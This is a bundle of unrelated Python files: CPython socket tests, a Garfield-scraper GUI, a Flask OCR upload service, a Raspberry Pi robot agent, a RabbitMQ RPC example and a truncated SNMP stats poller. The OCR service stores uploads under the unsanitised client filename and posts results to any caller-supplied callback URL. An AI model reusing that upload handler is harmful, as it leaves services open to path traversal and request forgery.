file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
interface.py | from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import os
import numpy as np
import threading
cprocess = np.array([False,False,False,False])
processMap = ["Scraping ImSorryJon", "Scraping Garfield Strips", "Loading Scraped Data","Training the Network"]
import queue
def trainModel():
tdirs = []
if bool(sorryVar.get()): tdirs.append("ImSorryJon")
if bool(dailyVar.get()): tdirs.append("DailyGarf")
if bool(stripVar.get()): tdirs.append("Strips")
if (len(tdirs)>0):
runCommand("train.py --tdirs "+" ".join(tdirs),3)
print(tdirs)
else:
messagebox.showinfo("Error","No datasets selected")
root = Tk()
root.title("Algarfieithm Simplified Scripting Homolingual Operating (super)Leveled Executor")
nb = ttk.Notebook(root)
nb.grid()
f1 = Frame(nb)
nb.add(f1, text="Scrape")
f2 = Frame(nb)
nb.add(f2, text="Train")
nb.select(f2)
nb.enable_traversal()
Label(f1, width = 0, height = 1,).grid(row=0,column=0)
Button(f1,width = 30, text="Scrape all datasets",command=lambda: runCommand("loadScrape.py",2)).grid(row=1,column=0,columnspan=3)
Label(f1, width = 0, height = 1,).grid(row=2,column=0)
Label(f2, width = 0, height = 1,).grid(row=0,column=0)
dailyVar = IntVar()
Checkbutton(f2, text="Use DailyGarf", variable=dailyVar).grid(row=0, column=0,columnspan=1)
stripVar = IntVar()
Checkbutton(f2, text="Use Garf Strips", variable=stripVar).grid(row=0, column=1,columnspan=1)
sorryVar = IntVar()
Checkbutton(f2, text="Use ImSorryJon", variable=sorryVar).grid(row=0, column=2,columnspan=1)
Button(f2,width = 30, text="Train Network on /r/Imsorryjon",command=trainModel).grid(row=3,column=0,rowspan=2)
Label(f2, width = 0, height = 1,).grid(row=4,column=0)
status=Label(f1,text="No process started")
status.grid(row=3,column=0)
status2=Label(f2,text="No process started")
status2.grid(row=5,column=0)
def rCArchetpye(command,i):
global cprocess
os.system(command)
cprocess[i] = False
def runCommand(fname,i):
global cprocess
if not (i<2 and cprocess[2]) and not (i == 2 and np.any(cprocess[:2])) and not cprocess[i]:
cprocess[i] = True
nT = threading.Thread(target=rCArchetpye,args=("python "+fname,i))
nT.start()
else:
messagebox.showinfo("Error","This instruction is not compatible with currently running processes. Wait for these to finish.")
def updateStatus():
if (not np.any(cprocess)):
newStatus = "No process started"
else:
processes = []
for d in range(len(cprocess)):
if (cprocess[d]): processes.append(processMap[d])
newStatus="Processes: "+(", ".join(processes))
status.configure(text=newStatus)
status2.configure(text=newStatus)
root.after(500,updateStatus)
root.after(0,updateStatus)
root.protocol("WM_DELETE_WINDOW", lambda: os._exit(0))
root.mainloop() |
web.py | # coding=utf-8
import sys
import os
import threading
import getopt
import queue
import json
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(name)s - %(message)s')
# http 请求模块
import requests
from flask import Flask
from flask import request
sys.path.append(os.getcwd())
from main.ctpn import CTPN
logger = logging.getLogger(__file__)
app = Flask(__name__)
# ctpn 工作队列。通过该队列将文件传递给 ctpn 服务
ctpnWorkerQueue = queue.Queue(1000)
# 等待回调的图片字典,图片文件路径作为字典的 key
waitCallbackDict = {'fileName': 'url'}
# 支持上传的文件名后缀
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def ctpnCallback(fileName, ctpnRes) :
# todo 回调改为异步
if fileName in waitCallbackDict :
url = waitCallbackDict.get(fileName)
try:
response = requests.post(url = url, data=json.dumps(ctpnRes), headers={'Content-type': 'application/json'})
if response.status_code == 200 :
logger.info('回调成功')
waitCallbackDict.pop(fileName)
return
logger.warning('回调失败')
except Exception as e:
logger.exception('回调异常', e)
@app.route('/', methods=['GET'])
def hello_world():
return 'Hello, CTPN !'
@app.route('/api/ctpn.htm', methods=['GET', 'POST'])
def api_ocr():
"""
请求参数:
ctpnImg: 需要识别的图片文件
callbackUrl: 回调地址。识别结束后,异步通知处理结果
"""
if request.method == 'GET':
return 'Hello, CTPN !'
elif request.method == 'POST':
if 'ctpnImg' not in request.files:
return 'No image!'
file = request.files['ctpnImg']
if file.filename == '':
return 'No image!'
if file and allowed_file(file.filename):
# 保存文件到本地
imgFilePath = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
file.save(imgFilePath)
# 添加到待回调集合
waitCallbackDict[imgFilePath] = request.form['callbackUrl']
# 提交到 ctpn 工作队列
ctpnWorkerQueue.put(imgFilePath)
return 'ok'
return 'Image type error!'
return 'unknown method!'
def main(host, port, workDir, ctpnDebug):
# 转换上传路径为绝对路径
uploadDir = os.path.abspath(os.path.join(workDir, 'upload'))
if not os.path.exists(uploadDir) :
os.makedirs(name = uploadDir, exist_ok = True)
logger.info('创建上传路径:{}'.format(uploadDir))
# 转换上传路径为绝对路径
outputDir = os.path.abspath(os.path.join(workDir, 'output'))
if not os.path.exists(outputDir) :
os.makedirs(name = outputDir, exist_ok = True)
logger.info('创建输出路径:{}'.format(outputDir))
# 文件上传路径
app.config['UPLOAD_FOLDER'] = uploadDir
# 文件上传尺寸限制
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
# ctpn 服务
ctpnService = CTPN(workerQueue = ctpnWorkerQueue, callback = ctpnCallback, outputPath = outputDir, debug = ctpnDebug)
def ctpnServiceRun():
logger.info("启动 CTPN 服务")
ctpnService.start()
logger.warn("CTPN 服务退出")
# ctpn 线程
ctpnThread = threading.Thread(target=ctpnServiceRun, name='ctpn')
logger.info("启动 CTPN 服务线程...")
ctpnThread.start()
logger.info("启动 CTPN 服务线程成功")
logger.info("启动 web 服务...")
app.run(host=host, port=port)
logger.info("web 服务停止")
logger.info("终止 CTPN 服务...")
ctpnService.stop()
logger.info("等待 CTPN 服务线程退出...")
ctpnThread.join()
logger.info("终止 CTPN 服务成功")
def usage():
print("Usage:")
print(" --host\t\t flask 绑定的 IP 地址,默认:0.0.0.0")
print(" --port\t\t flask 绑定的端口,默认:20000")
print(" --workDir\t\t 工作路径")
print(" --ctpnDebug\t\t ctpn 调试开关。True:生成调试图片供参考")
print(" --help\t\t 删除帮助信息")
print("")
if __name__ == '__main__':
"""
python main\web.py
"""
options, args = getopt.getopt(sys.argv[1:], '', ["help", "host=", "port=", "workDir=", "ctpnDebug="])
optionDict = {}
for option in options:
optionDict[option[0]] = None if len(option) == 1 else option[1]
if '--help' in optionDict :
usage()
sys.exit()
else :
main(host=optionDict.get('--host', '0.0.0.0')
, port=int(optionDict.get('--port', '20000'))
, workDir=optionDict.get('--workDir')
, ctpnDebug=bool(optionDict.get('--ctpnDebug', False)))
|
agents.py | #!/usr/bin/python
# vim:fileencoding=utf-8
import sys, time, threading
from sensors import Buttons
from actuators import StepMotorPair, Leds, Buzzer
class Agent:
def __init__(self):
self.state = "init"
self.motors = StepMotorPair()
self.buttons = Buttons()
self.buzzer = Buzzer()
self.leds = Leds()
self.camera = PiCamera()
threading.Thread(target=self.__reset_check).start()
def do_action(self):
while True:
if self.state == "init":
self.__init()
self.state = "init_ok"
elif self.state == "ready":
self.__ready()
self.state = "ready_ok"
elif self.state == "run":
self.leds.change_all(0,0,0,0)
self.buzzer.off()
self.state = "run_ok"
elif self.state == "run_ok":
self.loop()
continue
elif self.state == "off":
self.__init()
sys.exit(0)
time.sleep(0.1)
def __init(self):
self.leds.change_all(1,1,1,0)
self.buzzer.off()
self.motors.off()
self.setup()
def __ready(self):
self.leds.change_all(1,1,1,1)
self.buzzer.on(4000)
self.motors.on()
def __reset_check(self):
while True:
self.buttons.update()
if self.buttons.all_pushed_now():
self.state = "off"
return
elif self.buttons.front_pushed():
self.__state_transition()
time.sleep(0.1)
def __state_transition(self):
if self.state == "init_ok": self.state = "ready"
elif self.state == "ready_ok": self.state = "run"
elif self.state == "run_ok": self.state = "init"
class AgentHello(Agent):
def __init__(self):
Agent.__init__(self)
def setup(self):
print >> sys.stderr, "setup"
def loop(self):
self.buttons.update()
if self.buttons.center_pushed():
self.motors.turn(90)
elif self.buttons.back_pushed():
self.motors.turn(-90)
print "Hello world"
import os,picamera
from sensors import PiCamera
class AgentFileListener(Agent):
def __init__(self):
Agent.__init__(self)
self.opfile = "/run/shm/op"
self.imagefile = "/var/www/image.jpg"
def setup(self):
try: os.remove(self.opfile)
except: pass
def loop(self):
try:
with open(self.opfile,"r") as f:
op = f.readline().rstrip()
os.remove(self.opfile)
except:
time.sleep(0.01)
return;
if op == "left": self.motors.turn(10)
elif op == "right": self.motors.turn(-10)
elif op == "fw": self.motors.forward(30)
elif op == "photo":
self.camera.capture(self.imagefile)
if __name__ == '__main__':
agent = AgentFileListener()
agent.do_action()
|
pika_async_rpc_example.py | """
This is a simple example on how to use Flask and Asynchronous RPC calls.
I kept this simple, but if you want to use this properly you will need
to expand the concept.
Things that are not included in this example.
- Reconnection strategy.
- Closing or re-opening the connection.
- Keep in mind that anything you want to open or close the connection,
you should first lock it.
with self.internal_lock
self.channel.stop_consuming()
self.connection.close()
- You also need to stop the process loop if you are intentionally
closing the connection.
- Consider implementing utility functionality for checking and getting
responses.
def has_response(correlation_id)
def get_response(correlation_id)
Apache/wsgi configuration.
- Each process you start with apache will create a new connection to
RabbitMQ.
- I would recommend depending on the size of the payload that you have
about 100 threads per process. If the payload is larger, it might be
worth to keep a lower thread count per process.
For questions feel free to email me: me@eandersson.net
"""
__author__ = 'eandersson'
import pika
import uuid
import threading
from time import sleep
from flask import Flask
app = Flask(__name__)
class RpcClient(object):
"""Asynchronous Rpc client."""
internal_lock = threading.Lock()
queue = {}
def __init__(self, rpc_queue):
"""Set up the basic connection, and start a new thread for processing.
1) Setup the pika connection, channel and queue.
2) Start a new daemon thread.
"""
self.rpc_queue = rpc_queue
self.connection = pika.BlockingConnection()
self.channel = self.connection.channel()
result = self.channel.queue_declare(exclusive=True)
self.callback_queue = result.method.queue
thread = threading.Thread(target=self._process_data_events)
thread.setDaemon(True)
thread.start()
def _process_data_events(self):
"""Check for incoming data events.
We do this on a thread to allow the flask instance to send
asynchronous requests.
It is important that we lock the thread each time we check for events.
"""
self.channel.basic_consume(on_message_callback=self._on_response, auto_ack=False,
queue=self.callback_queue)
while True:
with self.internal_lock:
self.connection.process_data_events()
sleep(0.1)
def _on_response(self, ch, method, props, body):
"""On response we simply store the result in a local dictionary."""
self.queue[props.correlation_id] = body
def send_request(self, payload):
"""Send an asynchronous Rpc request.
The main difference from the rpc example available on rabbitmq.com
is that we do not wait for the response here. Instead we let the
function calling this request handle that.
corr_id = rpc_client.send_request(payload)
while rpc_client.queue[corr_id] is None:
sleep(0.1)
return rpc_client.queue[corr_id]
If this is a web application it is usually best to implement a
timeout. To make sure that the client wont be stuck trying
to load the call indefinitely.
We return the correlation id that the client then use to look for
responses.
"""
corr_id = str(uuid.uuid4())
self.queue[corr_id] = None
with self.internal_lock:
self.channel.basic_publish(exchange='',
routing_key=self.rpc_queue,
properties=pika.BasicProperties(
reply_to=self.callback_queue,
correlation_id=corr_id,
),
body=payload)
return corr_id
@app.route('/rpc_call/<payload>')
def rpc_call(payload):
"""Simple Flask implementation for making asynchronous Rpc calls. """
corr_id = rpc_client.send_request(payload)
while rpc_client.queue[corr_id] is None:
sleep(0.1)
return rpc_client.queue[corr_id]
if __name__ == '__main__':
rpc_client = RpcClient('rpc_queue')
app.run()
|
stats_poller.py | import os
import re
import sys
import time
import yaml
import socket
import logging
import urllib2
import rrdtool
import argparse
import multiprocessing as mp
from scalrpy.util import rpc
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import cryptotool
from scalrpy.util import basedaemon
from sqlalchemy import and_
from sqlalchemy import exc as db_exc
from multiprocessing import pool
from scalrpy import __version__
oids_data = {
'cpu':{
'user':'.1.3.6.1.4.1.2021.11.50.0',
'nice':'.1.3.6.1.4.1.2021.11.51.0',
'system':'.1.3.6.1.4.1.2021.11.52.0',
'idle':'.1.3.6.1.4.1.2021.11.53.0',
},
'la':{
'la1':'.1.3.6.1.4.1.2021.10.1.3.1',
'la5':'.1.3.6.1.4.1.2021.10.1.3.2',
'la15':'.1.3.6.1.4.1.2021.10.1.3.3',
},
'mem':{
'swap':'.1.3.6.1.4.1.2021.4.3.0',
'swapavail':'.1.3.6.1.4.1.2021.4.4.0',
'total':'.1.3.6.1.4.1.2021.4.5.0',
'avail':'.1.3.6.1.4.1.2021.4.6.0',
'free':'.1.3.6.1.4.1.2021.4.11.0',
'shared':'.1.3.6.1.4.1.2021.4.13.0',
'buffer':'.1.3.6.1.4.1.2021.4.14.0',
'cached':'.1.3.6.1.4.1.2021.4.15.0',
},
'net':{
'in':'.1.3.6.1.2.1.2.2.1.10.2',
'out':'.1.3.6.1.2.1.2.2.1.16.2',
}
}
cpu_source = [
'DS:user:COUNTER:600:U:U',
'DS:system:COUNTER:600:U:U',
'DS:nice:COUNTER:600:U:U',
'DS:idle:COUNTER:600:U:U'
]
cpu_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800']
la_source = [
'DS:la1:GAUGE:600:U:U',
'DS:la5:GAUGE:600:U:U',
'DS:la15:GAUGE:600:U:U'
]
la_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800'
]
mem_source = [
'DS:swap:GAUGE:600:U:U',
'DS:swapavail:GAUGE:600:U:U',
'DS:total:GAUGE:600:U:U',
'DS:avail:GAUGE:600:U:U',
'DS:free:GAUGE:600:U:U',
'DS:shared:GAUGE:600:U:U',
'DS:buffer:GAUGE:600:U:U',
'DS:cached:GAUGE:600:U:U'
]
mem_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800'
]
net_source = [
'DS:in:COUNTER:600:U:21474836480',
'DS:out:COUNTER:600:U:21474836480'
]
net_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800'
]
servers_num_source = [
'DS:s_running:GAUGE:600:U:U'
]
servers_num_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800'
]
io_source = [
'DS:read:COUNTER:600:U:U',
'DS:write:COUNTER:600:U:U',
'DS:rbyte:COUNTER:600:U:U',
'DS:wbyte:COUNTER:600:U:U'
]
io_archive = [
'RRA:AVERAGE:0.5:1:800',
'RRA:AVERAGE:0.5:6:800',
